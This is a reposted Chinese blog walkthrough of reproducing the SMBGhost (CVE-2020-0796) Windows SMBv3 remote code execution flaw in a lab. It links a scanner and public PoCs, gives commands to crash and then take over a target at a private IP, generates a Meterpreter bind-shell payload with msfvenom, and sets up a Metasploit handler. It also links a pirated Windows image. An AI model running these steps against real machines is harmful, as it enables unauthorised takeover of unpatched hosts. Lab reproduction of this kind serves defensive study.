我是靠谱客的博主 认真铅笔,最近开发中收集的这篇文章主要介绍【漏洞复现】CVE-2020-0796 SMBv3远程代码执行资源漏洞利用2. POC 蓝屏3.RCE,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

攻击者可能利用此漏洞远程无需用户验证,通过发送构造特殊的恶意数据导致在目标系统上执行恶意代码,受攻击的目标系统只需开机在线即可能被入侵。从而获取机器的完全控制,利用端口445

影响版本:
漏洞主要影响Windows10版本(1903和1909),包括32位、64位的家用版、专业版、企业版、教育版

资源

检测工具:http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip
蓝屏EXP:https://github.com/eerykitty/CVE-2020-0796-PoC
RCE poc:https://github.com/chompie1337/SMBGhost_RCE_PoC
参考:https://blog.csdn.net/Eastmount/article/details/105350314
windows 10纯净版:(建议迅雷下载)

ed2k://|file|cn_windows_10_business_editions_version_1903_updated_sept_2019_x64_dvd_2f5281e1.iso|5231140864|B1D5C4C401036B0B1EBA64476A95F338|/

漏洞利用

靶机版本:Windows 10 Version 1903 for x64-based Systems
靶机IP:192.168.1.4

1.漏洞探测

奇安信检测工具适用于局域网批量检测,快速查找未打补丁的机器

http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip

在这里插入图片描述

2. POC 蓝屏

https://github.com/eerykitty/CVE-2020-0796-PoC

python CVE-2020.0796.py 192.168.1.12

在这里插入图片描述

3.RCE

https://github.com/chompie1337/SMBGhost_RCE_PoC

①payload生成

msfvenom  -p windows/x64/meterpreter/bind_tcp  lport=1234 -f py -o smb.py

②.将文件smb.py里面buf的值替换到exploit.py中
在这里插入图片描述③ 运行POC

python3 exploit.py -ip 192.168.1.12

在这里插入图片描述④MSF 开启监听

use exploit/multi/handlermsf5 
set payload windows/x64/meterpreter/bind_tcp
set lport 1234lport => 1234
set rhost 192.168.1.12
run

在这里插入图片描述
⑤ 成功建立会话。监听端口后如果一直不弹shell,可重新运行一次
在这里插入图片描述=============================================================================
在这里插入图片描述

最后

以上就是认真铅笔为你收集整理的【漏洞复现】CVE-2020-0796 SMBv3远程代码执行资源漏洞利用2. POC 蓝屏3.RCE的全部内容,希望文章能够帮你解决【漏洞复现】CVE-2020-0796 SMBv3远程代码执行资源漏洞利用2. POC 蓝屏3.RCE所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(37)

评论列表共有 0 条评论

立即
投稿
返回
顶部